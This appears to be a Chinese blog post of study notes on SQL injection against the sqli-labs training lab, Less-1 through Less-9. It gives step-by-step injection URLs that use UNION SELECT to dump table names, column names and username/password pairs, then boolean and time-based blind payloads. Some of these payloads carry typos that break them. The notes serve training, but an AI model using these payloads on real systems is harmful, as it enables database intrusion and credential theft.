Sql注入基础

sql注入前置理解

bash 复制代码
在这里插入代码片select * from users where id = $id ---- 数字型注入----select * from users where id = 1 or 1=1---搞定

select * from users where id = 'id' ---- 字符型注入----select * from users where id = '1 or 1=1'---可以,一个整体都是id的值,有warning是它的容错,所以需要闭合标点符号 

mysql的注释是--空格或者#号

get传参存在url编码,防止空格被编码,+会被注释为空格,所以--+

闭合符有(),',",(())等

Less-1:

1.sql注入类型。先当作数字型处理,出不来数据,and起作用了。如果能出来数据,闭合符里面为---1 and 1=2---,说明是字符型

复制代码
MariaDB [security]> select * from security.users where id =1 and 1=2 --+;
http://172.25.254.184/sqli/Less-1/?id=1 and 1=2 --+

2.判断闭合符。用and的逻辑判断闭合符,所以闭合符为'

复制代码
MariaDB [security]> select * from security.users where id ='1' and 1=2 --+';
http://172.25.254.184/sqli/Less-1/?id=1' and 1=2 --+

3.查询查询的列数(order by | group by),用union实现联合注入。判断是3列

复制代码
http://172.25.254.184/sqli/Less-1/?id=1' order by 4 --+

4.判断回显的位置。在2和3的位置,再这里写sql语句

复制代码
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,2,3 --+

5.获取表名

复制代码
MariaDB [information_schema]> select group_concat(table_name) from information_schema.tables where table_schema='security';
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(table_name) from information_schema.tables where table_schema='security' --+

6.获取列名---列出所有用group_concat或者limit

复制代码
MariaDB [security]> select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users';
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'; --+

7.查数据

复制代码
MariaDB [security]> select group_concat(username,'~',password) from security.users;
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),group_concat(username,'~',password) from security.users --+

8.截取

复制代码
MariaDB [security]> select substr(group_concat(username,'~',password),1,32) from security.users;
http://172.25.254.184/sqli/Less-1/?id=-1' union select 1,(select database()),substr(group_concat(username,'~',password),1,32) from security.users --+

Less-2

第一步:判断--是数字型

复制代码
http://172.25.254.1/sqli/Less-2/?id=1 and 1=2 --+

第二步:判断--列数---3列数据

复制代码
http://172.25.254.1/sqli/Less-2/?id=1 order by 4 --+

第三步:判断回显位置---在2,3的位置

复制代码
http://172.25.254.1/sqli/Less-2/?id=-1 union select 1,2,3 --+

Less-3

第一步:判断--是字符型

复制代码
http://172.25.254.1/sqli/Less-3/?id=1 and 1=2 --+

第二步:判断闭合符---')

复制代码
http://172.25.254.1/sqli/Less-3/?id=1') and 1=2 --+

第三步:判断列数--四列

复制代码
http://172.25.254.184/sqli/Less-3/?id=1') order by 4 --+

第四步:判断回显位置

复制代码
http://172.25.254.184/sqli/Less-3/?id=-1') union select 1,2,3 --+

Less-4--")

第一步:判断--是字符型

复制代码
http://172.25.254.1/sqli/Less-4/?id=1 and 1=2 --+

第二步:判断闭合符---")

复制代码
http://172.25.254.184/sqli/Less-4/?id=1") and 1=2 --+

第三步:判断列数--四列

复制代码
http://172.25.254.184/sqli/Less-4/?id=1") order by 4 --+

第四步:判断回显位置

复制代码
http://172.25.254.184/sqli/Less-4/?id=-1") union select 1,2,3 --+

Less-5--布尔盲注--只有true和false

复制代码
http://172.25.254.1/sqli/Less-5/?id=1 and length(database())=8 --+

ascii加二分定位每一个字符

复制代码
http://172.25.254.1/sqli/Less-5/?id=1 and ascii(aubstr(database(),1,1)<125 --+

Less-9---时间盲注

IF(条件,成功返回,失败返回)--字符型

复制代码
http://172.25.254.1/sqli/Less-9/?id=1' sleep(3) --+

http://172.25.254.1/sqli/Less-9/?id=1' and (length(database())>3,sleep(3),0) --+

http://172.25.254.1/sqli/Less-9/?id=1' and (substr(database(),1,1)="s",sleep(3),0) --+
相关推荐
这个DBA有点耶4 天前
MVCC深入:Read View、版本链与快照读——InnoDB并发控制的内核
数据库·mysql·架构
DBA_G4 天前
从地面到云霄:GBase数据库在民航三大场景的落地实践
数据库
自由能燃气设备4 天前
商用全预混低氮冷凝锅炉免费方案vs付费方案对比+选型避坑指南
大数据·数据库·人工智能
科创致远4 天前
科创致远 ESOP 系统核心效能与实战价值展示
大数据·数据库·人工智能·精益工程
龙亘川4 天前
一网统管AI平台民生业务实践:基于城市数字底座赋能公积金业务服务升级
大数据·安全·智慧城市·开源软件·数据可视化·政务
kybs19914 天前
全球灾害数据分析可视化 毕业设计-附源码66794
vue.js·spring boot·mysql·安全·django·c#·asp.net
2601_962218614 天前
万象生鲜系统称重自动多退少补算法解决生鲜非标品痛点
大数据·数据库·人工智能·python·算法
张洛闻Eren4 天前
k8s云原生【第十课】:水平 Pod 自动扩缩容
运维·数据库·云原生·kubernetes·github
于平安4 天前
MySQL-触发器
数据库·mysql